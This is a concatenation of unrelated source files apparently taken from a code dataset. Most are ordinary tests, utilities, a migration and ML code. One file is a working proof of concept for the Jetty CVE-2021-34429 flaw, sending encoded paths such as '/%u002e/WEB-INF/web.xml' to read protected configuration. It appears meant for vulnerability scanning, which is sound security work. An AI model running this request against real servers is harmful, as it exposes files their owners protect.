status = b"200 OK"
if req.method == "GET":
body = to_bytes("""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="single_select_form">
<select id="single" name="single">
<option value="4">Four</option>
<option value="5">Five</option>
<option value="6">Six</option>
<option value="7">Seven</option>
</select>
<input name="button" type="submit" value="single">
</form>
<form method="POST" id="multiple_select_form">
<select id="multiple" name="multiple" multiple="multiple">
<option value="8">Eight</option>
<option value="9">Nine</option>
<option value="10">Ten</option>
<option value="11">Eleven</option>
</select>
<input name="button" type="submit" value="multiple">
</form>
</body>
</html>
""")
else:
select_type = req.POST.get("button")
if select_type == "single":
selection = req.POST.get("single")
elif select_type == "multiple":
selection = ", ".join(req.POST.getall("multiple"))
body = to_bytes("""
<html>
<head><title>display page</title></head>
<body>
<p>You submitted the %(select_type)s </p>
<p>You selected %(selection)s</p>
</body>
</html>
""" % dict(selection=selection, select_type=select_type))
headers = [
('Content-Type', 'text/html; charset=utf-8'),
('Content-Length', str(len(body)))]
# PEP 3333 requires native strings:
headers = [(str(k), str(v)) for k, v in headers]
start_response(status, headers)
return [body]
def select_app_unicode(environ, start_response):
req = Request(environ)
status = b"200 OK"
if req.method == "GET":
body = u("""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="single_select_form">
<select id="single" name="single">
<option value="ЕКБ">Екатеринбург</option>
<option value="МСК" selected="selected">Москва</option>
<option value="СПБ">Санкт-Петербург</option>
<option value="САМ">Самара</option>
</select>
<input name="button" type="submit" value="single">
</form>
<form method="POST" id="multiple_select_form">
<select id="multiple" name="multiple" multiple="multiple">
<option value="8" selected="selected">Лондон</option>
<option value="9">Париж</option>
<option value="10">Пекин</option>
<option value="11" selected="selected">Бристоль</option>
</select>
<input name="button" type="submit" value="multiple">
</form>
</body>
</html>
""").encode('utf8')
else:
select_type = req.POST.get("button")
if select_type == "single":
selection = req.POST.get("single")
elif select_type == "multiple":
selection = ", ".join(req.POST.getall("multiple"))
body = (u("""
<html>
<head><title>display page</title></head>
<body>
<p>You submitted the %(select_type)s </p>
<p>You selected %(selection)s</p>
</body>
</html>
""") % dict(selection=selection, select_type=select_type)).encode('utf8')
headers = [
('Content-Type', 'text/html; charset=utf-8'),
('Content-Length', str(len(body)))]
# PEP 3333 requires native strings:
headers = [(str(k), str(v)) for k, v in headers]
start_response(status, headers)
if not isinstance(body, bytes):
raise AssertionError('Body is not %s' % bytes)
return [body]
class TestSelect(unittest.TestCase):
def test_unicode_select(self):
app = webtest.TestApp(select_app_unicode)
res = app.get('/')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, u("МСК"))
display = single_form.submit("button")
self.assertIn(u("<p>You selected МСК</p>"), display, display)
res = app.get('/')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, u("МСК"))
single_form.set("single", u("СПБ"))
self.assertEqual(single_form["single"].value, u("СПБ"))
display = single_form.submit("button")
self.assertIn(u("<p>You selected СПБ</p>"), display, display)
def test_single_select(self):
app = webtest.TestApp(select_app)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "5")
display = single_form.submit("button")
self.assertIn("<p>You selected 5</p>", display, display)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "5")
single_form.set("single", "6")
self.assertEqual(single_form["single"].value, "6")
display = single_form.submit("button")
self.assertIn("<p>You selected 6</p>", display, display)
res = app.get('/')
single_form = res.forms["single_select_form"]
self.assertRaises(ValueError, single_form.select, "single", "5",
text="Five")
self.assertRaises(ValueError, single_form.select, "single",
text="Three")
single_form.select("single", text="Seven")
self.assertEqual(single_form["single"].value, "7")
display = single_form.submit("button")
self.assertIn("<p>You selected 7</p>", display, display)
def test_single_select_forced_value(self):
app = webtest.TestApp(select_app)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "5")
self.assertRaises(ValueError, single_form.set, "single", "984")
single_form["single"].force_value("984")
self.assertEqual(single_form["single"].value, "984")
display = single_form.submit("button")
self.assertIn("<p>You selected 984</p>", display, display)
def test_single_select_no_default(self):
app = webtest.TestApp(select_app_without_default)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "4")
display = single_form.submit("button")
self.assertIn("<p>You selected 4</p>", display, display)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "4")
single_form.set("single", 6)
self.assertEqual(single_form["single"].value, "6")
display = single_form.submit("button")
self.assertIn("<p>You selected 6</p>", display, display)
def test_multiple_select(self):
app = webtest.TestApp(select_app)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ['8', '11'],
multiple_form["multiple"].value)
display = multiple_form.submit("button")
self.assertIn("<p>You selected 8, 11</p>", display, display)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ["8", "11"],
multiple_form["multiple"].value)
multiple_form.set("multiple", ["9"])
self.assertEqual(multiple_form["multiple"].value, ["9"],
multiple_form["multiple"].value)
display = multiple_form.submit("button")
self.assertIn("<p>You selected 9</p>", display, display)
res = app.get('/')
multiple_form = res.forms["multiple_select_form"]
self.assertRaises(ValueError, multiple_form.select_multiple,
"multiple",
["8", "10"], texts=["Eight", "Ten"])
self.assertRaises(ValueError, multiple_form.select_multiple,
"multiple", texts=["Twelve"])
multiple_form.select_multiple("multiple",
texts=["Eight", "Nine", "Ten"])
display = multiple_form.submit("button")
self.assertIn("<p>You selected 8, 9, 10</p>", display, display)
def test_multiple_select_forced_values(self):
app = webtest.TestApp(select_app)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ["8", "11"],
multiple_form["multiple"].value)
self.assertRaises(ValueError, multiple_form.set,
"multiple", ["24", "88"])
multiple_form["multiple"].force_value(["24", "88"])
self.assertEqual(multiple_form["multiple"].value, ["24", "88"],
multiple_form["multiple"].value)
display = multiple_form.submit("button")
self.assertIn("<p>You selected 24, 88</p>", display, display)
def test_multiple_select_no_default(self):
app = webtest.TestApp(select_app_without_default)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertTrue(multiple_form["multiple"].value is None,
repr(multiple_form["multiple"].value))
display = multiple_form.submit("button")
self.assertIn("<p>You selected </p>", display, display)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertTrue(multiple_form["multiple"].value is None,
multiple_form["multiple"].value)
multiple_form.set("multiple", ["9"])
self.assertEqual(multiple_form["multiple"].value, ["9"],
multiple_form["multiple"].value)
display = multiple_form.submit("button")
self.assertIn("<p>You selected 9</p>", display, display)
def test_select_no_value(self):
app = webtest.TestApp(select_app_without_values)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "Four")
display = single_form.submit("button")
self.assertIn("<p>You selected Four</p>", display, display)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["single_select_form"]
self.assertEqual(single_form["single"].value, "Four")
single_form.set("single", "Six")
self.assertEqual(single_form["single"].value, "Six")
display = single_form.submit("button")
self.assertIn("<p>You selected Six</p>", display, display)
def test_multiple_select_no_value(self):
app = webtest.TestApp(select_app_without_values)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ["Nine", "Eleven"])
display = multiple_form.submit("button")
self.assertIn("<p>You selected Nine, Eleven</p>", display, display)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ["Nine", "Eleven"])
multiple_form.set("multiple", ["Nine", "Ten"])
self.assertEqual(multiple_form["multiple"].value, ["Nine", "Ten"])
display = multiple_form.submit("button")
self.assertIn("<p>You selected Nine, Ten</p>", display, display)
def test_multiple_select_reset_value(self):
app = webtest.TestApp(select_app_without_values)
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
multiple_form = res.forms["multiple_select_form"]
self.assertEqual(multiple_form["multiple"].value, ["Nine", "Eleven"])
# reset with value
multiple_form["multiple"].value = []
self.assertIsNone(multiple_form["multiple"].value)
# re-set a value
multiple_form["multiple"].value = ['Nine']
assert multiple_form["multiple"].value == ['Nine']
# reset with force_value
multiple_form["multiple"].force_value(None)
self.assertIsNone(multiple_form["multiple"].value)
display = multiple_form.submit("button")
self.assertIn("<p>You selected </p>", display, display)
class SingleUploadFileApp:
body = b"""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="file_upload_form"
enctype="multipart/form-data">
<input name="file-field" type="file" value="some/path/file.txt" />
<input name="int-field" type="text" value="" />
<input name="button" type="submit" value="single">
</form>
</body>
</html>
"""
def __call__(self, environ, start_response):
req = Request(environ)
status = b"200 OK"
if req.method == "GET":
body = self.body
else:
body = b"""
<html>
<head><title>display page</title></head>
<body>
""" + self.get_files_page(req) + b"""
</body>
</html>
"""
headers = [
('Content-Type', 'text/html; charset=utf-8'),
('Content-Length', str(len(body)))]
# PEP 3333 requires native strings:
headers = [(str(k), str(v)) for k, v in headers]
start_response(status, headers)
assert(isinstance(body, bytes))
return [body]
def get_files_page(self, req):
file_parts = []
uploaded_files = [(k, v) for k, v in req.POST.items() if 'file' in k]
uploaded_files = sorted(uploaded_files)
for name, uploaded_file in uploaded_files:
if isinstance(uploaded_file, cgi.FieldStorage):
filename = to_bytes(uploaded_file.filename)
value = to_bytes(uploaded_file.value, 'ascii')
content_type = to_bytes(uploaded_file.type, 'ascii')
else:
filename = value = content_type = b''
file_parts.append(b"""
<p>You selected '""" + filename + b"""'</p>
<p>with contents: '""" + value + b"""'</p>
<p>with content type: '""" + content_type + b"""'</p>
""")
return b''.join(file_parts)
class UploadBinaryApp(SingleUploadFileApp):
def get_files_page(self, req):
uploaded_files = [(k, v) for k, v in req.POST.items() if 'file' in k]
data = uploaded_files[0][1].value
data = struct.unpack(b'255h', data[:510])
return b','.join([to_bytes(str(i)) for i in data])
class MultipleUploadFileApp(SingleUploadFileApp):
body = b"""
<html>
<head><title>form page</title></head>
<body>
<form method="POST" id="file_upload_form"
enctype="multipart/form-data">
<input name="file-field-1" type="file" />
<input name="file-field-2" type="file" />
<input name="button" type="submit" value="single">
</form>
</body>
</html>
"""
class TestFileUpload(unittest.TestCase):
def assertFile(self, name, contents, display, content_type=None):
if isinstance(name, bytes):
text_name = name.decode('ascii')
else:
text_name = name
self.assertIn("<p>You selected '" + text_name + "'</p>",
display, display)
if isinstance(contents, bytes):
text_contents = contents.decode('ascii')
else:
text_contents = contents
self.assertIn("<p>with contents: '" + text_contents + "'</p>",
display, display)
if content_type:
self.assertIn("<p>with content type: '" + content_type + "'</p>",
display, display)
def test_no_uploads_error(self):
app = webtest.TestApp(SingleUploadFileApp())
app.get('/').forms["file_upload_form"].upload_fields()
def test_upload_without_file(self):
app = webtest.TestApp(SingleUploadFileApp())
upload_form = app.get('/').forms["file_upload_form"]
upload_form.submit()
def test_file_upload_with_filename_only(self):
uploaded_file_name = os.path.join(os.path.dirname(__file__),
"__init__.py")
uploaded_file_contents = open(uploaded_file_name).read()
uploaded_file_contents = to_bytes(uploaded_file_contents)
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
self.assertEqual(res.charset, 'utf-8')
single_form = res.forms["file_upload_form"]
single_form.set("file-field", (uploaded_file_name,))
display = single_form.submit("button")
self.assertFile(uploaded_file_name, uploaded_file_contents, display)
def test_file_upload_with_filename_and_contents(self):
uploaded_file_name = os.path.join(os.path.dirname(__file__),
"__init__.py")
uploaded_file_contents = open(uploaded_file_name).read()
uploaded_file_contents = to_bytes(uploaded_file_contents)
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["file_upload_form"]
single_form.set("file-field",
(uploaded_file_name, uploaded_file_contents))
display = single_form.submit("button")
self.assertFile(uploaded_file_name, uploaded_file_contents, display)
def test_file_upload_with_content_type(self):
uploaded_file_name = os.path.join(os.path.dirname(__file__),
"__init__.py")
with open(uploaded_file_name, 'rb') as f:
uploaded_file_contents = f.read()
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
single_form = res.forms["file_upload_form"]
single_form["file-field"].value = Upload(uploaded_file_name,
uploaded_file_contents,
'text/x-custom-type')
display = single_form.submit("button")
self.assertFile(uploaded_file_name, uploaded_file_contents, display,
content_type='text/x-custom-type')
def test_file_upload_binary(self):
binary_data = struct.pack('255h', *range(0, 255))
app = webtest.TestApp(UploadBinaryApp())
res = app.get('/')
single_form = res.forms["file_upload_form"]
single_form.set("file-field", ('my_file.dat', binary_data))
display = single_form.submit("button")
self.assertIn(','.join([str(n) for n in range(0, 255)]), display)
def test_multiple_file_uploads_with_filename_and_contents(self):
uploaded_file1_name = os.path.join(os.path.dirname(__file__),
"__init__.py")
uploaded_file1_contents = open(uploaded_file1_name).read()
uploaded_file1_contents = to_bytes(uploaded_file1_contents)
uploaded_file2_name = __file__
uploaded_file2_name = os.path.join(os.path.dirname(__file__), 'html',
"404.html")
uploaded_file2_contents = open(uploaded_file2_name).read()
uploaded_file2_contents = to_bytes(uploaded_file2_contents)
app = webtest.TestApp(MultipleUploadFileApp())
res = app.get('/')
self.assertEqual(res.status_int, 200)
self.assertEqual(res.headers['content-type'],
'text/html; charset=utf-8')
self.assertEqual(res.content_type, 'text/html')
single_form = res.forms["file_upload_form"]
single_form.set("file-field-1",
(uploaded_file1_name, uploaded_file1_contents))
single_form.set("file-field-2",
(uploaded_file2_name, uploaded_file2_contents))
display = single_form.submit("button")
self.assertFile(uploaded_file1_name, uploaded_file1_contents, display)
        self.assertFile(uploaded_file2_name, uploaded_file2_contents, display)
def test_post_int(self):
binary_data = struct.pack('255h', *range(0, 255))
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
single_form = res.forms["file_upload_form"]
single_form.set("file-field", ('my_file.dat', binary_data))
single_form.set("int-field", 100)
# just check it does not raise
single_form.submit("button")
def test_invalid_types(self):
binary_data = struct.pack('255h', *range(0, 255))
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
single_form = res.forms["file_upload_form"]
single_form.set("file-field", ('my_file.dat', binary_data))
single_form.set("int-field", SingleUploadFileApp())
self.assertRaises(ValueError, single_form.submit, "button")
def test_upload_invalid_content(self):
app = webtest.TestApp(SingleUploadFileApp())
res = app.get('/')
single_form = res.forms["file_upload_form"]
single_form.set("file-field", ('my_file.dat', 1))
try:
single_form.submit("button")
except ValueError:
e = sys.exc_info()[1]
            self.assertEqual(
str(e),
u('File content must be %s not %s' % (bytes, int))
)
def test_invalid_uploadfiles(self):
app = webtest.TestApp(SingleUploadFileApp())
self.assertRaises(ValueError, app.post, '/', upload_files=[()])
self.assertRaises(
ValueError,
app.post, '/',
upload_files=[('name', 'filename', 'content', 'extra')]
)
def test_goto_upload_files(self):
app = webtest.TestApp(SingleUploadFileApp())
resp = app.get('/')
resp = resp.goto(
'/',
method='post',
upload_files=[('file', 'filename', b'content')]
)
resp.mustcontain("<p>You selected 'filename'</p>",
"<p>with contents: 'content'</p>")
def test_post_upload_files(self):
app = webtest.TestApp(SingleUploadFileApp())
resp = app.post(
'/',
upload_files=[('file', 'filename', b'content')]
)
resp.mustcontain("<p>You selected 'filename'</p>",
"<p>with contents: 'content'</p>")
def test_post_upload_empty_files(self):
app = webtest.TestApp(SingleUploadFileApp())
resp = app.post(
'/',
upload_files=[('file', 'filename', b'')]
)
resp.mustcontain("<p>You selected 'filename'</p>",
"<p>with contents: ''</p>")
resp = app.get('/')
form = resp.form
form['file-field'] = Upload('filename', b'', 'text/plain')
resp = form.submit()
resp.mustcontain("<p>You selected 'filename'</p>",
"<p>with contents: ''</p>")
|
regtests/test-all.py | ahakingdom/Rusthon | 622 | 12770760 | <filename>regtests/test-all.py
import os, subprocess
os.chdir( os.path.split(__file__)[0] )
subprocess.check_call(['python', 'test-c++.py'])
subprocess.check_call(['python', 'test-go.py'])
subprocess.check_call(['python', 'test-javascript.py'])
subprocess.check_call(['python', 'test-markdowns.py'])
|
rastervision_core/rastervision/core/utils/misc.py | theoway/raster-vision | 1,577 | 12770766 | <reponame>theoway/raster-vision
import io
from pydantic import confloat
from PIL import Image
import numpy as np
import imageio
import logging
Proportion = confloat(ge=0, le=1)
log = logging.getLogger(__name__)
def save_img(im_array, output_path):
imageio.imwrite(output_path, im_array)
def numpy_to_png(array: np.ndarray) -> str:
"""Get a PNG string from a Numpy array.
Args:
array: A Numpy array of shape (w, h, 3) or (w, h), where the
former is meant to become a three-channel image and the
latter a one-channel image. The dtype of the array
should be uint8.
Returns:
str
"""
im = Image.fromarray(array)
output = io.BytesIO()
im.save(output, 'png')
return output.getvalue()
def png_to_numpy(png: str, dtype=np.uint8) -> np.ndarray:
"""Get a Numpy array from a PNG string.
Args:
png: A str containing a PNG-formatted image.
Returns:
numpy.ndarray
"""
incoming = io.BytesIO(png)
im = Image.open(incoming)
return np.array(im)
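

# Illustrative round-trip sketch (added for clarity; not part of the original module):
#
#     arr = np.random.randint(0, 256, size=(32, 32, 3), dtype=np.uint8)
#     png_bytes = numpy_to_png(arr)          # encode to an in-memory PNG
#     restored = png_to_numpy(png_bytes)     # decode back to a uint8 array
#     assert np.array_equal(arr, restored)   # PNG encoding is lossless for uint8 RGB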
|
python-sdk/experimental/deploy-triton/src/score_densenet.py | 0mza987/azureml-examples | 331 | 12770767 | <gh_stars>100-1000
import io
import numpy as np
import os
from azureml.core import Model
from azureml.contrib.services.aml_request import rawhttp
from azureml.contrib.services.aml_response import AMLResponse
from PIL import Image
from onnxruntimetriton import InferenceSession
def preprocess(img, scaling): # , dtype):
"""Pre-process an image to meet the size, type and format
requirements specified by the parameters.
"""
c = 3
h = 224
w = 224
format = "FORMAT_NCHW"
if c == 1:
sample_img = img.convert("L")
else:
sample_img = img.convert("RGB")
resized_img = sample_img.resize((w, h), Image.BILINEAR)
resized = np.array(resized_img)
if resized.ndim == 2:
resized = resized[:, :, np.newaxis]
# npdtype = triton_to_np_dtype(dtype)
typed = resized.astype(np.float32)
# typed = resized
if scaling == "INCEPTION":
scaled = (typed / 128) - 1
elif scaling == "VGG":
if c == 1:
            scaled = typed - np.asarray((128,), dtype=np.float32)
else:
            scaled = typed - np.asarray((123, 117, 104), dtype=np.float32)
else:
scaled = typed
# Swap to CHW if necessary
if format == "FORMAT_NCHW":
ordered = np.transpose(scaled, (2, 0, 1))
else:
ordered = scaled
# Channels are in RGB order. Currently model configuration data
# doesn't provide any information as to other channel orderings
# (like BGR) so we just assume RGB.
return ordered
def postprocess(output_array):
"""Post-process results to show the predicted label."""
output_array = output_array[0]
max_label = np.argmax(output_array)
final_label = label_dict[max_label]
return f"{max_label} : {final_label}"
def init():
global session, label_dict
session = InferenceSession(path_or_bytes="densenet_onnx")
model_dir = os.path.join(os.environ["AZUREML_MODEL_DIR"], "models")
folder_path = os.path.join(model_dir, "triton", "densenet_onnx")
label_path = os.path.join(
model_dir, "triton", "densenet_onnx", "densenet_labels.txt"
)
    with open(label_path, "r") as label_file:
        labels = label_file.read().split("\n")
label_dict = dict(enumerate(labels))
@rawhttp
async def run(request):
"""This function is called every time your webservice receives a request.
Notice you need to know the names and data types of the model inputs and
outputs. You can get these values by reading the model configuration file
or by querying the model metadata endpoint.
"""
if request.method == "POST":
outputs = []
for output in session.get_outputs():
outputs.append(output.name)
input_name = session.get_inputs()[0].name
reqBody = await request.get_data()
img = Image.open(io.BytesIO(reqBody))
image_data = preprocess(img, scaling="INCEPTION")
res = session.run(outputs, {input_name: image_data})
result = postprocess(output_array=res)
return AMLResponse(result, 200)
else:
return AMLResponse("bad request", 500)
|
resource_tracker/migrations/0005_auto_20211015_1015.py | LaudateCorpus1/squest | 112 | 12770793 | # Generated by Django 3.2.7 on 2021-10-15 08:15
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('resource_tracker', '0004_alter_resourcepoolattributedefinition_resource_pool'),
]
operations = [
migrations.RenameField(
model_name='resourcegroupattributedefinition',
old_name='resource_group_definition',
new_name='resource_group',
),
migrations.RenameField(
model_name='resourcegrouptextattributedefinition',
old_name='resource_group_definition',
new_name='resource_group',
),
migrations.AlterUniqueTogether(
name='resourcegroupattributedefinition',
unique_together={('name', 'resource_group')},
),
migrations.AlterUniqueTogether(
name='resourcegrouptextattributedefinition',
unique_together={('name', 'resource_group')},
),
]
|
src/main/python/systemds/operator/algorithm/builtin/shortestPath.py | mdbloice/systemds | 372 | 12770804 | <reponame>mdbloice/systemds
# -------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# -------------------------------------------------------------
# Autogenerated By : src/main/python/generator/generator.py
# Autogenerated From : scripts/builtin/shortestPath.dml
from typing import Dict, Iterable
from systemds.operator import OperationNode, Matrix, Frame, List, MultiReturn, Scalar
from systemds.script_building.dag import OutputType
from systemds.utils.consts import VALID_INPUT_TYPES
def shortestPath(G: Matrix,
sourceNode: int,
**kwargs: Dict[str, VALID_INPUT_TYPES]):
"""
    :param G: adjacency matrix of the graph; entries can be 0/1 (just specifying whether
        the nodes are connected or not) or integer values (representing the weight of the
        edges or the distances between nodes, 0 if not connected).
    :param maxi: Integer max number of iterations accepted (0 for FALSE, i.e. the maximum
        number of iterations is not defined)
    :param sourceNode: index of the node from which the shortest paths to all other nodes
        are calculated.
    :param verbose: flag for verbose debug output
    :return: 'OperationNode' containing the minimum distance shortest-path from vertex i to
        vertex j. If the minimum distance is infinity, the two nodes are not connected.
"""
params_dict = {'G': G, 'sourceNode': sourceNode}
params_dict.update(kwargs)
return Matrix(G.sds_context,
'shortestPath',
named_input_nodes=params_dict)
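

# Illustrative usage sketch (added for clarity; not part of the generated file).
# It assumes a running SystemDS context and a NumPy adjacency matrix `adjacency`
# in which a 0 entry means "not connected":
#
#     from systemds.context import SystemDSContext
#
#     with SystemDSContext() as sds:
#         G = sds.from_numpy(adjacency)
#         distances = shortestPath(G, sourceNode=1, maxi=0).compute()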
|
algorithms/math/modular_exponentiation.py | jainrocky/python-ds | 1,723 | 12770811 | # to compute modular power
# Iterative Function to calculate
# (x^y)%p in O(log y)
def power(x, y, p) :
res = 1 # Initialize result
# Update x if it is more
# than or equal to p
x = x % p
while (y > 0) :
# If y is odd, multiply
# x with result
if ((y & 1) == 1) :
res = (res * x) % p
# y must be even now
y = y >> 1 # y = y/2
x = (x * x) % p
    return res
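

# Worked example (added for illustration; not part of the original file):
# power(2, 10, 1000) returns 24, since 2**10 = 1024 and 1024 % 1000 = 24,
# which matches Python's built-in three-argument pow: pow(2, 10, 1000) == 24.
|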
asset/api.py | 745184532/cmdb | 251 | 12770820 | from rest_framework import generics
from .models import AssetInfo
from .serializers import AssetSerializer
from rest_framework import permissions
class AssetList(generics.ListCreateAPIView):
queryset = AssetInfo.objects.all()
serializer_class = AssetSerializer
permission_classes = (permissions.AllowAny,)
class AssetDetail(generics.RetrieveUpdateDestroyAPIView):
queryset = AssetInfo.objects.all()
serializer_class = AssetSerializer
permission_classes = (permissions.AllowAny,)
|
data_collection/gazette/spiders/sc_pescaria_brava.py | kaiocp/querido-diario | 454 | 12770827 | from gazette.spiders.base.fecam import FecamGazetteSpider
class ScPescariaBravaSpider(FecamGazetteSpider):
name = "sc_pescaria_brava"
FECAM_QUERY = 'entidade:"Prefeitura Municipal de Pescaria Brava"'
TERRITORY_ID = "4212650"
|
2021/CVE-2021-34429/poc/pocsploit/CVE-2021-34429.py | hjyuan/reapoc | 421 | 12770845 | <reponame>hjyuan/reapoc
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Jetty Authorization Before Parsing and Canonicalization Variation''',
"description": '''For Eclipse Jetty versions 9.4.37-9.4.42, 10.0.1-10.0.5 & 11.0.1-11.0.5, URIs can be crafted using some encoded characters to access the content of the WEB-INF directory and/or bypass some security constraints. This is a variation of the vulnerability reported in CVE-2021-28164/GHSA-v7ff-8wcx-gmc5.''',
"severity": "medium",
"references": [
"https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"cvss-score": "",
"cve-id": "CVE-2021-34429",
"cwe-id": "CWE-200"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "jetty"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/%u002e/WEB-INF/web.xml"""
method = "GET"
data = """"""
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/.%00/WEB-INF/web.xml"""
method = "GET"
data = """"""
headers = {}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp1.status_code == 200) and ("""</web-app>""" in resp1.text and """java.sun.com""" in resp1.text) and ("""application/xml""" in str(resp1.headers)):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url |
assignment1/q2_neural.py | gyubokLee/CS224 | 125 | 12770851 | <reponame>gyubokLee/CS224
import numpy as np
import random
from q1_softmax import softmax
from q2_sigmoid import sigmoid, sigmoid_grad
from q2_gradcheck import gradcheck_naive
def affine_forward(x, w, b):
"""
Computes the forward pass for an affine (fully-connected) layer.
The input x has shape (N, d_1, ..., d_k) and contains a minibatch of N
examples, where each example x[i] has shape (d_1, ..., d_k). We will
reshape each input into a vector of dimension D = d_1 * ... * d_k, and
then transform it to an output vector of dimension M.
Inputs:
- x: A numpy array containing input data, of shape (N, d_1, ..., d_k)
- w: A numpy array of weights, of shape (D, M)
- b: A numpy array of biases, of shape (M,)
Returns a tuple of:
- out: output, of shape (N, M)
- cache: (x, w, b)
"""
out = None
N = x.shape[0]
D = np.prod(x.shape[1:])
M = b.shape[1]
out = np.dot(x.reshape(N, D), w.reshape(D, M)) + b.reshape(1, M)
return out, (x,w,b)
def affine_backward(dout, cache):
"""
Computes the backward pass for an affine layer.
Inputs:
- dout: Upstream derivative, of shape (N, M)
- cache: Tuple of:
- x: Input data, of shape (N, d_1, ... d_k)
- w: Weights, of shape (D, M)
Returns a tuple of:
- dx: Gradient with respect to x, of shape (N, d1, ..., d_k)
- dw: Gradient with respect to w, of shape (D, M)
- db: Gradient with respect to b, of shape (M,)
"""
x, w, b = cache
dx, dw, db = None, None, None
N = x.shape[0]
D = np.prod(x.shape[1:])
M = b.shape[1]
dx = np.dot(dout, w.reshape(D, M).T).reshape(x.shape)
dw = np.dot(x.reshape(N, D).T, dout).reshape(w.shape)
db = np.sum(dout, axis=0)
return dx, dw, db
def sigmoid_forward(x):
"""
Computes the forward pass for a sigmoid activation.
Inputs:
- x: Input data, numpy array of arbitary shape;
